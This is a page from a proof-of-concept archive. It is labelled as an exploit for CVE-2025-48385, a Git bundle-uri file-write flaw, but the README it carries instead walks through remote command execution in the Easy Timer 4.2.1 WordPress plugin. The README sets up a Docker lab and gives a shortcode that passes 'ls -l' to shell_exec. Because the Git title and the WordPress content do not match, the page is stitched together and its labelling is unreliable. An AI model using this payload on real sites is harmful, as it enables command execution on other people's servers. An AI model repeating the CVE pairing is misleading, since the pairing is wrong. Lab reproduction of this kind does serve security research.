Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-48385 PoC — Git alllows arbitrary file writes via bundle-uri parameter injection

Source
https://github.com/Nimisha17/Git-clone-CVE-2025-48385
Associated Vulnerability
Title:Git alllows arbitrary file writes via bundle-uri parameter injection (CVE-2025-48385)
Description:Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When cloning a repository Git knows to optionally fetch a bundle advertised by the remote server, which allows the server-side to offload parts of the clone to a CDN. The Git client does not perform sufficient validation of the advertised bundles, which allows the remote side to perform protocol injection. This protocol injection can cause the client to write the fetched bundle to a location controlled by the adversary. The fetched content is fully controlled by the server, which can in the worst case lead to arbitrary code execution. The use of bundle URIs is not enabled by default and can be controlled by the bundle.heuristic config option. Some cases of the vulnerability require that the adversary is in control of where a repository will be cloned to. This either requires social engineering or a recursive clone with submodules. These cases can thus be avoided by disabling recursive clones. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Readme
# Easy Timer v4.2.1 - 

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress
```

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post** to see the timer execute.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />




## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />


* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).


* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the Database to finish setting up
File Snapshot

 [4.0K]  /data/pocs/73272bf67c1789f88d7365ccbf74c20873077216
├── [1.1K]  docker-compose.yml
└── [2.3K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →